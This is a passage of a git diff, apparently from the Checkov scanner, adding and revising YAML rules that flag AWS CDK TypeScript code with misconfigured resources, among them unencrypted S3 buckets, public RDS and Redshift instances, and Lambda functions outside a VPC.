+            new $PACKAGE.aws_lambda.Function(<ANY>, <ANY>, { <ANY>, environment: { <ANY>, $ARG1:'$ARG2', <ANY> }, <ANY>, environmentEncryption: $KMS, <ANY> })
+        - not_pattern: |
+            new $PACKAGE.aws_lambda.Function(<ANY>, <ANY>, { <ANY>, environmentEncryption: $KMS, <ANY>, environment: { <ANY>, $ARG1:'$ARG2', <ANY> }, <ANY> })
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: |
+        new $PACKAGE.aws_lambda.CfnFunction(<ANY>, <ANY>, { <ANY>, environment: { <ANY>, variables: { <ANY>, $ARG1:'$ARG2', <ANY>}, <ANY>}, <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_lambda.CfnFunction(<ANY>, <ANY>, { <ANY>, environment: { <ANY>, variables: { $ARG1:'$ARG2' }, <ANY> }, <ANY>, kmsKeyArn: $KMS, <ANY> })
+        - not_pattern: |
+            new $PACKAGE.aws_lambda.CfnFunction(<ANY>, <ANY>, { <ANY>, kmsKeyArn: $KMS, <ANY>, environment: { <ANY>, variables: { <ANY>, $ARG1:'$ARG2', <ANY>}, <ANY> })
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: |
+        new $PACKAGE.aws_sam.CfnFunction(<ANY>, <ANY>, { <ANY>, environment: { <ANY>, variables: { $ARG1:'$ARG2'}, <ANY>}, <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_sam.CfnFunction(<ANY>, <ANY>, { <ANY>, environment: { <ANY>, variables: { $ARG1:'$ARG2'}, <ANY>, kmsKeyArn: $KMS, <ANY> }, <ANY> })
+        - not_pattern: |
+            new $PACKAGE.aws_sam.CfnFunction(<ANY>, <ANY>, { <ANY>, kmsKeyArn: $KMS, <ANY>, environment: { <ANY>, variables: { <ANY>, $ARG1:'$ARG2', <ANY> }, <ANY> })
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: |
+        $X = { <ANY>, environment: { $ARG1:'$ARG2' }, <ANY> }
+      conditions:
+        - not_pattern: |
+            $X = { <ANY>, environment: { <ANY>, $ARG1:'$ARG2', <ANY> }, <ANY>, environmentEncryption: $KMS, <ANY> }
+        - not_pattern: |
+            $X = { <ANY>, environmentEncryption: $KMS, <ANY>, environment: { <ANY>, $ARG1:'$ARG2', <ANY> }, <ANY> }
+        - metavariable: $X
+          type: aws-cdk-lib.aws_lambda.FunctionProps
+    - pattern: |
+        $X =  { <ANY>, environment: { <ANY>, variables: { <ANY>, $ARG1:'$ARG2', <ANY> }, <ANY>}, <ANY> }
+      conditions:
+        - not_pattern: |
+            $X = { <ANY>, environment: { <ANY>, variables: { <ANY>, $ARG1:'$ARG2', <ANY> }, <ANY> }, <ANY>, kmsKeyArn: $KMS, <ANY> }
+        - not_pattern: |
+            $X = { <ANY>, kmsKeyArn: $KMS, <ANY>, environment: { <ANY>, variables: { <ANY>, $ARG1:'$ARG2', <ANY> }, <ANY> }, <ANY> }
+        - metavariable: $X
+          type: aws-cdk-lib.aws_lambda.CfnFunctionProps
+    - pattern: |
+        $X = { <ANY>, environment: { <ANY>, variables: { <ANY>, $ARG1:'$ARG2', <ANY> }, <ANY>}, <ANY> }
+      conditions:
+        - not_pattern: |
+            $X = { <ANY>, environment: { <ANY>, variables: { <ANY>, $ARG1:'$ARG2', <ANY> }, <ANY>, kmsKeyArn: $KMS, <ANY> }, <ANY> }
+        - not_pattern: |
+            $X = { <ANY>, kmsKeyArn: $KMS, <ANY>, environment: { <ANY>, variables: { <ANY>, $ARG1:'$ARG2', <ANY> }, <ANY> }, <ANY> }
+        - metavariable: $X
+          type: aws-cdk-lib.aws_sam.CfnFunctionProps
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/LambdaFunctionLevelConcurrentExecutionLimit.yaml b/checkov/cdk/checks/typescript/LambdaFunctionLevelConcurrentExecutionLimit.yaml
new file mode 100644
index 00000000000..cfe66be7480
--- /dev/null
+++ b/checkov/cdk/checks/typescript/LambdaFunctionLevelConcurrentExecutionLimit.yaml
@@ -0,0 +1,51 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_115
+  name: Ensure that AWS Lambda function is configured for function-level concurrent execution limit
+  category: GENERAL_SECURITY
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  or:
+    - pattern: new $PACKAGE.aws_lambda.Function(<ANY>, <ANY>, { <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_lambda.Function(<ANY>, <ANY>, { <ANY>, reservedConcurrentExecutions: $NUM, <ANY> }, <ANY>)
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: new $PACKAGE.aws_lambda.CfnFunction(<ANY>, <ANY>, { <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_lambda.CfnFunction(<ANY>, <ANY>, { <ANY>, "reservedConcurrentExecutions": $NUM, <ANY> }, <ANY>)
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: new $PACKAGE.aws_sam.CfnFunction(<ANY>, <ANY>, { <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_sam.CfnFunction(<ANY>, <ANY>, { <ANY>, reservedConcurrentExecutions: $NUM, <ANY> }, <ANY>)
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: |
+        $X = { <ANY> }
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_lambda.FunctionProps
+        - not_pattern: |
+            $X = { <ANY>, reservedConcurrentExecutions: $NUM, <ANY> }
+    - pattern: |
+        $X =  { <ANY> }
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_lambda.CfnFunctionProps
+        - not_pattern: |
+            $X = { <ANY>, reservedConcurrentExecutions: $NUM, <ANY> }
+    - pattern: |
+        $X = { <ANY> }
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_sam.CfnFunctionProps
+        - not_pattern: |
+            $X = { <ANY>, reservedConcurrentExecutions: $NUM, <ANY> }
diff --git a/checkov/cdk/checks/typescript/LambdaInVPC.yaml b/checkov/cdk/checks/typescript/LambdaInVPC.yaml
new file mode 100644
index 00000000000..41d830ff169
--- /dev/null
+++ b/checkov/cdk/checks/typescript/LambdaInVPC.yaml
@@ -0,0 +1,51 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_117
+  name: Ensure that AWS Lambda function is configured inside a VPC
+  category: GENERAL_SECURITY
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  or:
+    - pattern: new $PACKAGE.aws_lambda.Function(<ANY>, <ANY>, { <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_lambda.Function(<ANY>, <ANY>, { <ANY>, vpc: <ANY>, <ANY> } )
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: new $PACKAGE.aws_lambda.CfnFunction(<ANY>, <ANY>, { <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_lambda.CfnFunction(<ANY>, <ANY>, { <ANY>, vpcConfig: <ANY>, <ANY> } )
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: new $PACKAGE.aws_sam.CfnFunction(<ANY>, <ANY>, { <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_sam.CfnFunction(<ANY>, <ANY>, { <ANY>, vpcConfig: <ANY>, <ANY> } )
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: |
+        $X = { <ANY> }
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_lambda.FunctionProps
+        - not_pattern: |
+            $X = { <ANY>, vpc: <ANY>, <ANY> }
+    - pattern: |
+        $X =  { <ANY> }
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_lambda.CfnFunctionProps
+        - not_pattern: |
+            $X = { <ANY>, vpcConfig: <ANY>, <ANY> }
+    - pattern: |
+        $X = { <ANY> }
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_sam.CfnFunctionProps
+        - not_pattern: |
+            $X = { <ANY>, vpcConfig: <ANY>, <ANY> }
diff --git a/checkov/cdk/checks/typescript/LaunchConfigurationEBSEncryption.yaml b/checkov/cdk/checks/typescript/LaunchConfigurationEBSEncryption.yaml
new file mode 100644
index 00000000000..8d3ba9295ef
--- /dev/null
+++ b/checkov/cdk/checks/typescript/LaunchConfigurationEBSEncryption.yaml
@@ -0,0 +1,22 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_8
+  name: Ensure all data stored in the Launch configuration EBS is securely encrypted
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  or:
+    - pattern: |
+        new $PACKAGE.aws_autoscaling.CfnLaunchConfiguration(<ANY>, <ANY>, { <ANY>, blockDeviceMappings: [<ANY>, { <ANY>, 'ebs':{ <ANY>, 'encrypted': false, <ANY>}, <ANY>} ,<ANY>], <ANY> })
+      conditions:
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: |
+        $X = { <ANY>, blockDeviceMappings: [<ANY>, { <ANY>, 'ebs':{ <ANY>, 'encrypted': false, <ANY>}, <ANY>} ,<ANY>], <ANY> }
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_autoscaling.CfnLaunchConfigurationProps
diff --git a/checkov/cdk/checks/typescript/NeptuneClusterStorageEncrypted.yaml b/checkov/cdk/checks/typescript/NeptuneClusterStorageEncrypted.yaml
new file mode 100644
index 00000000000..06d96fcf8a7
--- /dev/null
+++ b/checkov/cdk/checks/typescript/NeptuneClusterStorageEncrypted.yaml
@@ -0,0 +1,25 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_44
+  name: Ensure Neptune storage is securely encrypted
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  or:
+    - pattern: new $PACKAGE.aws_neptune.CfnDBCluster(<ANY>, <ANY>, { <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_neptune.CfnDBCluster(<ANY>, <ANY>, { <ANY>, storageEncrypted: true, <ANY> })
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: |
+        $X = { <ANY> }
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_neptune.CfnDBClusterProps
+        - not_pattern: |
+            $X = { <ANY>, storageEncrypted: true, <ANY> }
diff --git a/checkov/cdk/checks/typescript/RDSEnhancedMonitorEnabled.yaml b/checkov/cdk/checks/typescript/RDSEnhancedMonitorEnabled.yaml
new file mode 100644
index 00000000000..d8328fda9db
--- /dev/null
+++ b/checkov/cdk/checks/typescript/RDSEnhancedMonitorEnabled.yaml
@@ -0,0 +1,19 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_118
+  name: Ensure that enhanced monitoring is enabled for Amazon RDS instances
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $PACKAGE.aws_rds.DatabaseInstance(<ANY>, <ANY>, { <ANY> })
+  conditions:
+    - not_pattern: |
+        new $PACKAGE.aws_rds.DatabaseInstance(<ANY>, <ANY>, { <ANY>, monitoringInterval: $COUNT, <ANY> })
+    - metavariable: $COUNT # bug: should preform with not_pattern and not after BCE-33034
+      comparison: $COUNT > 0
+    - metavariable: $PACKAGE
+      comparison: $PACKAGE == "aws-cdk-lib"
diff --git a/checkov/cdk/checks/typescript/RDSMultiAZEnabled.yaml b/checkov/cdk/checks/typescript/RDSMultiAZEnabled.yaml
new file mode 100644
index 00000000000..e4e33ea9ae7
--- /dev/null
+++ b/checkov/cdk/checks/typescript/RDSMultiAZEnabled.yaml
@@ -0,0 +1,25 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_157
+  name: Ensure that RDS instances have Multi-AZ enabled
+  category: NETWORKING
+  framework: cdk
+scope:
+  languages:
+    - javascript
+    - typescript
+definition:
+  or:
+    - pattern: new $FUNC(<ANY>)
+      conditions:
+        - metavariable: $FUNC
+          regex: (?i)(CfnDBInstance|DatabaseInstance)
+        - not_pattern: |
+            'new $FUNC(<ANY>, multiAZ: true ,<ANY>)'
+    - pattern: new $RDS.$FUNC(<ANY>)
+      conditions:
+        - metavariable: $FUNC
+          regex: (?i)(CfnDBInstance|DatabaseInstance)
+        - not_pattern: |
+            'new $RDS.$FUNC(<ANY>, multiAZ: true ,<ANY>)'
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/RDSPubliclyAccessible.yaml b/checkov/cdk/checks/typescript/RDSPubliclyAccessible.yaml
new file mode 100644
index 00000000000..240b25ccab7
--- /dev/null
+++ b/checkov/cdk/checks/typescript/RDSPubliclyAccessible.yaml
@@ -0,0 +1,25 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_17 
+  name: Ensure all data stored in RDS is not publicly accessible
+  category: NETWORKING
+  framework: cdk
+scope:
+  languages:
+    - javascript
+    - typescript
+definition:
+  or:
+    - pattern: new $FUNC(<ANY>)
+      conditions:
+        - metavariable: $FUNC
+          regex: (?i)(CfnDBInstance|DatabaseInstance)
+        - not_pattern: |
+            'new $FUNC(<ANY>, publicly_accessible: true ,<ANY>)'
+    - pattern: new $RDS.$FUNC(<ANY>)
+      conditions:
+        - metavariable: $FUNC
+          regex: (?i)(CfnDBInstance|DatabaseInstance)
+        - not_pattern: |
+            'new $RDS.$FUNC(<ANY>, publicly_accessible: true ,<ANY>)'
diff --git a/checkov/cdk/checks/typescript/RedShiftSSL.yaml b/checkov/cdk/checks/typescript/RedShiftSSL.yaml
new file mode 100644
index 00000000000..841ebc20a99
--- /dev/null
+++ b/checkov/cdk/checks/typescript/RedShiftSSL.yaml
@@ -0,0 +1,19 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_105
+  name: Ensure Redshift uses SSL
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - javascript
+    - typescript
+definition:
+  or:
+    - pattern: new $REDSHIFT.CfnClusterParameterGroup(<ANY>)
+      conditions:
+        - not_pattern: |
+            new $REDSHIFT.CfnClusterParameterGroup(<ANY>, {<ANY>, parameters: [<ANY>, {<ANY>, parameterName: 'require_ssl' ,<ANY>, parameterValue: 'true', <ANY>} ,<ANY>], <ANY>}, <ANY>)
+        - not_pattern: |
+            new $REDSHIFT.CfnClusterParameterGroup(<ANY>, {<ANY>, parameters: [<ANY>, {<ANY>, parameterValue: 'true', <ANY>, parameterName: 'require_ssl' ,<ANY>} ,<ANY>], <ANY>}, <ANY>)
diff --git a/checkov/cdk/checks/typescript/RedshiftClusterEncryption.yaml b/checkov/cdk/checks/typescript/RedshiftClusterEncryption.yaml
new file mode 100644
index 00000000000..68cfb664283
--- /dev/null
+++ b/checkov/cdk/checks/typescript/RedshiftClusterEncryption.yaml
@@ -0,0 +1,30 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_64
+  name: Ensure all data stored in the Redshift cluster is securely encrypted at rest
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - javascript
+    - typescript
+definition:
+  patterns:
+    or:
+      - pattern: new $REDSHIFT.CfnCluster(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $REDSHIFT.CfnCluster(<ANY>, {<ANY>, encrypted: true, <ANY>} ,<ANY>)
+      - pattern: new $REDSHIFT.Cluster(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $REDSHIFT.Cluster(<ANY>, {<ANY>, encrypted: true, <ANY>} ,<ANY>)
+      - pattern: new CfnCluster(<ANY>)
+        conditions:
+          - not_pattern: |
+              new CfnCluster(<ANY>, {<ANY>, encrypted: true, <ANY>} ,<ANY>)
+      - pattern: new Cluster(<ANY>)
+        conditions:
+          - not_pattern: |
+              new Cluster(<ANY>, {<ANY>, encrypted: true, <ANY>} ,<ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/RedshiftClusterLogging.yaml b/checkov/cdk/checks/typescript/RedshiftClusterLogging.yaml
new file mode 100644
index 00000000000..7c989c414c8
--- /dev/null
+++ b/checkov/cdk/checks/typescript/RedshiftClusterLogging.yaml
@@ -0,0 +1,25 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_71
+  name: Ensure Redshift Cluster logging is enabled
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - javascript
+    - typescript
+definition:
+  or:
+    - pattern: new $FUNC(<ANY>)
+      conditions:
+        - metavariable: $FUNC
+          regex: (?i)(CfnCluster|Cluster|ClusterProps)
+        - not_pattern: |
+            'new $FUNC(<ANY>, logging_properties: $FUNC.LoggingPropertiesProperty = {<ANY>, bucketName:$ARG, <ANY>} ,<ANY>)'
+    - pattern: new $REDSHIFT.$FUNC(<ANY>)
+      conditions:
+        - metavariable: $FUNC
+          regex: (?i)(CfnCluster|Cluster|ClusterProps)
+        - not_pattern: |
+            'new $REDSHIFT.$FUNC(<ANY>, logging_properties: $REDSHIFT.$FUNC.LoggingPropertiesProperty = {<ANY>, bucketName:$ARG, <ANY>} ,<ANY>)'
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/RedshiftClusterPubliclyAccessible.yaml b/checkov/cdk/checks/typescript/RedshiftClusterPubliclyAccessible.yaml
new file mode 100644
index 00000000000..2e158c01ad1
--- /dev/null
+++ b/checkov/cdk/checks/typescript/RedshiftClusterPubliclyAccessible.yaml
@@ -0,0 +1,22 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_87
+  name: Redshift cluster should not be publicly accessible
+  category: NETWORKING
+  framework: cdk
+scope:
+  languages:
+    - javascript
+    - typescript
+definition:
+  patterns:
+    or:
+      - pattern: |
+          new $REDSHIFT.CfnCluster(<ANY>, {<ANY>, publiclyAccessible: true, <ANY>} ,<ANY>)
+      - pattern: |
+          new $REDSHIFT.Cluster(<ANY>, {<ANY>, publiclyAccessible: true, <ANY>} ,<ANY>)
+      - pattern: |
+          new CfnCluster(<ANY>, {<ANY>, publiclyAccessible: true, <ANY>} ,<ANY>)
+      - pattern: |
+          new Cluster(<ANY>, {<ANY>, publiclyAccessible: true, <ANY>} ,<ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/RedshiftInEc2ClassicMode.yaml b/checkov/cdk/checks/typescript/RedshiftInEc2ClassicMode.yaml
new file mode 100644
index 00000000000..cad3fb6bd56
--- /dev/null
+++ b/checkov/cdk/checks/typescript/RedshiftInEc2ClassicMode.yaml
@@ -0,0 +1,25 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_154
+  name: Ensure Redshift is not deployed outside of a VPC
+  category: NETWORKING
+  framework: cdk
+scope:
+  languages:
+    - javascript
+    - typescript
+definition:
+  or:
+    - pattern: new $FUNC(<ANY>)
+      conditions:
+        - metavariable: $FUNC
+          regex: (?i)(CfnCluster|Cluster|ClusterProps)
+        - not_pattern: |
+            'new $FUNC(<ANY>, clusterSubnetGroupName: $ARG ,<ANY>)'
+    - pattern: new $REDSHIFT.$FUNC(<ANY>)
+      conditions:
+        - metavariable: $FUNC
+          regex: (?i)(CfnCluster|Cluster|ClusterProps)
+        - not_pattern: |
+            'new $REDSHIFT.$FUNC(<ANY>, clusterSubnetGroupName: $ARG ,<ANY>)'
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/S3BlockPublicACLs.yaml b/checkov/cdk/checks/typescript/S3BlockPublicACLs.yaml
new file mode 100644
index 00000000000..521f6915721
--- /dev/null
+++ b/checkov/cdk/checks/typescript/S3BlockPublicACLs.yaml
@@ -0,0 +1,26 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_53
+  name: Ensure S3 bucket has block public ACLS enabled
+  category: GENERAL_SECURITY
+  framework: cdk
+scope:
+  languages:
+    - javascript
+    - typescript
+definition:
+  patterns:
+    or:
+      - pattern: new $S3.Bucket(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $S3.Bucket(<ANY>, { <ANY>, blockPublicAccess: $S3.BlockPublicAccess.BLOCK_ACLS , <ANY> } ,<ANY>)
+          - not_pattern: |
+              new $S3.Bucket(<ANY>, { <ANY>, blockPublicAccess: $S3.BlockPublicAccess.BLOCK_ALL , <ANY> } ,<ANY>)
+      - pattern: new Bucket(<ANY>)
+        conditions:
+          - not_pattern: |
+              new Bucket(<ANY>, { <ANY>, blockPublicAccess: BlockPublicAccess.BLOCK_ACLS , <ANY> } ,<ANY>)
+          - not_pattern: |
+              new Bucket(<ANY>, { <ANY>, blockPublicAccess: BlockPublicAccess.BLOCK_ALL , <ANY> } ,<ANY>)
diff --git a/checkov/cdk/checks/typescript/S3BlockPublicPolicy.yaml b/checkov/cdk/checks/typescript/S3BlockPublicPolicy.yaml
new file mode 100644
index 00000000000..1813bc5c663
--- /dev/null
+++ b/checkov/cdk/checks/typescript/S3BlockPublicPolicy.yaml
@@ -0,0 +1,33 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_54
+  name: Ensure S3 bucket has block public policy enabled
+  category: GENERAL_SECURITY
+  framework: cdk
+scope:
+  languages:
+    - javascript
+    - typescript
+definition:
+  or:
+    - pattern: new $FUNC(<ANY>)
+      conditions:
+        - metavariable: $FUNC
+          regex: (?i)(Bucket|CfnBucket)
+        - patterns:
+            or:
+              - not_pattern: |
+                  'new $FUNC(<ANY>, publicReadAccess: false ,<ANY>)'
+              - not_pattern: |
+                  "new $FUNC(<ANY>, accessControl: 'Private' ,<ANY>)"
+    - pattern: new $S3.$FUNC(<ANY>)
+      conditions:
+        - metavariable: $FUNC
+          regex: (?i)(Bucket|CfnBucket)
+        - patterns:
+            or:
+              - not_pattern: |
+                  'new $S3.$FUNC(<ANY>, publicReadAccess: false ,<ANY>)'
+              - not_pattern: |
+                  "new $S3.$FUNC(<ANY>, accessControl: 'Private' ,<ANY>)"
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/S3BucketEncryption.yaml b/checkov/cdk/checks/typescript/S3BucketEncryption.yaml
index 72629895e79..24156973ef5 100644
--- a/checkov/cdk/checks/typescript/S3BucketEncryption.yaml
+++ b/checkov/cdk/checks/typescript/S3BucketEncryption.yaml
@@ -1,47 +1,27 @@
 metadata:
-  version: 0.1
+  version: 0.2
+  approach: define failing
   id: CKV_AWS_19
   name: Ensure all data stored in the S3 bucket is securely encrypted at rest
   category: ENCRYPTION
+  framework: cdk
 scope:
   languages:
-    - javascript
     - typescript
 definition:
-  - or:
-      - and:
-          - cond_type: filter
-            attribute: pattern
-            operator: within
-            value: |
-              import { Bucket, BucketEncryption } from "aws-cdk-lib/aws-s3"
-              ...
-          - or:
-              - and:
-                - cond_type: pattern
-                  operator: equals
-                  value: "new Bucket(...)"
-                - cond_type: pattern
-                  operator: not_equals
-                  value: "new Bucket(..., {..., encryption: BucketEncryption.$ANY_VAR, ...}, ...)"
-              - cond_type: pattern
-                operator: equals
-                value: "new Bucket(..., {..., encryption: BucketEncryption.UNENCRYPTED, ...}, ...)"
-      - and:
-          - cond_type: filter
-            attribute: pattern
-            operator: within
-            value: |
-              import * as $Y from "aws-cdk-lib/aws-s3"
-              ...
-          - or:
-              - and:
-                - cond_type: pattern
-                  operator: equals
-                  value: "new $Y.Bucket(...)"
-                - cond_type: pattern
-                  operator: not_equals
-                  value: "new $Y.Bucket(..., {..., encryption: $Y.BucketEncryption.$ANY_VAR, ...}, ...)"
-              - cond_type: pattern
-                operator: equals
-                value: "new $Y.Bucket(..., {..., encryption: $Y.BucketEncryption.UNENCRYPTED, ...}, ...)"
+  pattern: new $AWS.$FUNC(<ANY>)
+  conditions:
+    - metavariable: $FUNC
+      regex: (?i)(Bucket|CfnBucket)
+    - not_pattern: |
+        new $AWS.$FUNC(<ANY>, { <ANY>, encryption: $AWS.BucketEncryption.KMS_MANAGED, <ANY> } ,<ANY>)
+    - not_pattern: |
+        new $AWS.$FUNC(<ANY>, { <ANY>, encryption: $AWS.BucketEncryption.S3_MANAGED, <ANY> } ,<ANY>)
+    - not_pattern: |
+        new $AWS.$FUNC(<ANY>, { <ANY>, encryption: $AWS.BucketEncryption.KMS, <ANY> } ,<ANY>)
+    - not_pattern: |
+        new $AWS.$FUNC(<ANY>, { <ANY>, encryption: BucketEncryption.KMS_MANAGED, <ANY> } ,<ANY>)
+    - not_pattern: |
+        new $AWS.$FUNC(<ANY>, { <ANY>, encryption: BucketEncryption.S3_MANAGED, <ANY> } ,<ANY>)
+    - not_pattern: |
+        new $AWS.$FUNC(<ANY>, { <ANY>, encryption: BucketEncryption.KMS, <ANY> } ,<ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/S3BucketKMSEncryption.yaml b/checkov/cdk/checks/typescript/S3BucketKMSEncryption.yaml
index 92b1dd0bf49..d67f639bf17 100644
--- a/checkov/cdk/checks/typescript/S3BucketKMSEncryption.yaml
+++ b/checkov/cdk/checks/typescript/S3BucketKMSEncryption.yaml
@@ -1,57 +1,23 @@
 metadata:
-  version: 0.1
+  version: 0.2
+  approach: define failing
   id: CKV_AWS_145
   name: Ensure that S3 buckets are encrypted with KMS by default
   category: ENCRYPTION
+  framework: cdk
 scope:
   languages:
-    - javascript
     - typescript
 definition:
-  - or:
-      - and:
-          - cond_type: filter
-            attribute: pattern
-            operator: within
-            value: |
-              import { Bucket, BucketEncryption } from "aws-cdk-lib/aws-s3"
-              ...
-          - or:
-              - and:
-                - cond_type: pattern
-                  operator: equals
-                  value: "new Bucket(...)"
-                - cond_type: pattern
-                  operator: not_equals
-                  value: "new Bucket(..., {..., encryption: BucketEncryption.$ANY_VAR, ...}, ...)"
-              - and:
-                - cond_type: variable
-                  variable: $ENCRYPTION
-                  operator: regex_match
-                  value: ^(S3_MANAGED|UNENCRYPTED)$
-                - cond_type: pattern
-                  operator: equals
-                  value: "new Bucket(..., {..., encryption: BucketEncryption.$ENCRYPTION, ...}, ...)"
-      - and:
-          - cond_type: filter
-            attribute: pattern
-            operator: within
-            value: |
-              import * as $Y from "aws-cdk-lib/aws-s3"
-              ...
-          - or:
-              - and:
-                - cond_type: pattern
-                  operator: equals
-                  value: "new $Y.Bucket(...)"
-                - cond_type: pattern
-                  operator: not_equals
-                  value: "new $Y.Bucket(..., {..., encryption: $Y.BucketEncryption.$ANY_VAR, ...}, ...)"
-              - and:
-                - cond_type: variable
-                  variable: $ENCRYPTION
-                  operator: regex_match
-                  value: ^(S3_MANAGED|UNENCRYPTED)$
-                - cond_type: pattern
-                  operator: equals
-                  value: "new $Y.Bucket(..., {..., encryption: $Y.BucketEncryption.$ENCRYPTION, ...}, ...)"
+  pattern: new $AWS.$FUNC(<ANY>)
+  conditions:
+    - metavariable: $FUNC
+      regex: (?i)(Bucket|CfnBucket)
+    - not_pattern: |
+        new $AWS.$FUNC(<ANY>, { <ANY>, encryption: $AWS.BucketEncryption.KMS_MANAGED, <ANY> } ,<ANY>)
+    - not_pattern: |
+        new $AWS.$FUNC(<ANY>, { <ANY>, encryption: $AWS.BucketEncryption.KMS, <ANY> } ,<ANY>)
+    - not_pattern: |
+        new $AWS.$FUNC(<ANY>, { <ANY>, encryption: BucketEncryption.KMS_MANAGED, <ANY> } ,<ANY>)
+    - not_pattern: |
+        new $AWS.$FUNC(<ANY>, { <ANY>, encryption: BucketEncryption.KMS, <ANY> } ,<ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/S3BucketLogging.yaml b/checkov/cdk/checks/typescript/S3BucketLogging.yaml
index 702c8662e6b..797d673a7a3 100644
--- a/checkov/cdk/checks/typescript/S3BucketLogging.yaml
+++ b/checkov/cdk/checks/typescript/S3BucketLogging.yaml
@@ -1,37 +1,17 @@
 metadata:
-  version: 0.1
+  version: 0.2
+  approach: define failing
   id: CKV_AWS_18
   name: Ensure the S3 bucket has access logging enabled
   category: LOGGING
+  framework: cdk
 scope:
   languages:
-    - javascript
     - typescript
 definition:
-  - or:
-      - and:
-          - cond_type: filter
-            attribute: pattern
-            operator: within
-            value: |
-              import { Bucket } from "aws-cdk-lib/aws-s3"
-              ...
-          - cond_type: pattern
-            operator: equals
-            value: "new Bucket(...)"
-          - cond_type: pattern
-            operator: not_equals
-            value: "new Bucket(..., {..., serverAccessLogsBucket: $ANY_VAR, ...}, ...)"
-      - and:
-          - cond_type: filter
-            attribute: pattern
-            operator: within
-            value: |
-              import * as $Y from "aws-cdk-lib/aws-s3"
-              ...
-          - cond_type: pattern
-            operator: equals
-            value: "new $Y.Bucket(...)"
-          - cond_type: pattern
-            operator: not_equals
-            value: "new $Y.Bucket(..., {..., serverAccessLogsBucket: $ANY_VAR, ...}, ...)"
+  pattern: new $AWS.$FUNC(<ANY>)
+  conditions:
+    - metavariable: $FUNC
+      regex: (Bucket|CfnBucket)
+    - not_pattern: |
+        new $AWS.$FUNC(<ANY>, { <ANY>, serverAccessLogsBucket: <ANY> , <ANY> } ,<ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/S3BucketPublicAccessBlock.yaml b/checkov/cdk/checks/typescript/S3BucketPublicAccessBlock.yaml
index e681a928245..7f8261284a2 100644
--- a/checkov/cdk/checks/typescript/S3BucketPublicAccessBlock.yaml
+++ b/checkov/cdk/checks/typescript/S3BucketPublicAccessBlock.yaml
@@ -1,37 +1,17 @@
 metadata:
-  version: 0.1
+  version: 0.2
+  approach: define failing
